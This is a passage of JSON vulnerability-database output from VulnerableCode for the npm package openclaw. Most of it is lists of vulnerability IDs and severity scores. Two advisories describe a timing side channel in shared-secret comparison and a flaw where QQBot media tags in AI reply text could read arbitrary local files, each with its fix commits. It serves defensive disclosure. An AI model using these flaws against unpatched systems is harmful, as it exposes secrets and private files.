"VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23" } ], "aliases": [ "GHSA-9gvx-vj57-vqqx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8z7r-a8dv-eueb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89861?format=api", "vulnerability_id": "VCID-96jd-x87b-s3ey", "summary": "OpenClaw: Shared-secret comparison call sites leaked length information through timing\n## Summary\n\nBefore OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences.\n\n## Impact\n\nThe affected paths exposed a low-severity timing side channel on secret comparison. The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41407", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12878", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12844", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12883", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41407" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41407", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41407" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison" }, { "reference_url": "https://github.com/advisories/GHSA-jj6q-rrrf-h66h", "reference_id": "GHSA-jj6q-rrrf-h66h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jj6q-rrrf-h66h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api", "purl": "pkg:npm/openclaw@2026.4.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-41407", "GHSA-jj6q-rrrf-h66h" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-96jd-x87b-s3ey" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89964?format=api", "vulnerability_id": "VCID-9hcd-uj62-8yeu", "summary": "OpenClaw: QQBot media tags could read arbitrary local files through reply text\n## Summary\n\nQQBot media tags could read arbitrary local files through reply text.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nQQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling.\n\n## Technical Details\n\nThe fix enforces the media storage boundary for all outbound QQBot local file paths.\n\n## Fix\n\nThe issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `604777e4414cc3b2ff8861f18f4fb04374c702c6`\n- PR: #63271\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43533", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18803", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20219", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20258", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43533" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/63271", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/63271" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43533", "reference_id": "CVE-2026-43533", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43533" }, { "reference_url": "https://github.com/advisories/GHSA-66r7-m7xm-v49h", "reference_id": "GHSA-66r7-m7xm-v49h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-66r7-m7xm-v49h" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags", "reference_id": "openclaw-arbitrary-local-file-read-via-qqbot-media-tags", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api", "purl": "pkg:npm/openclaw@2026.4.10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6cfj-zugb-7uhq" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hphn-8fnj-qkh2" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-q3a2-qk5j-1yat" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": 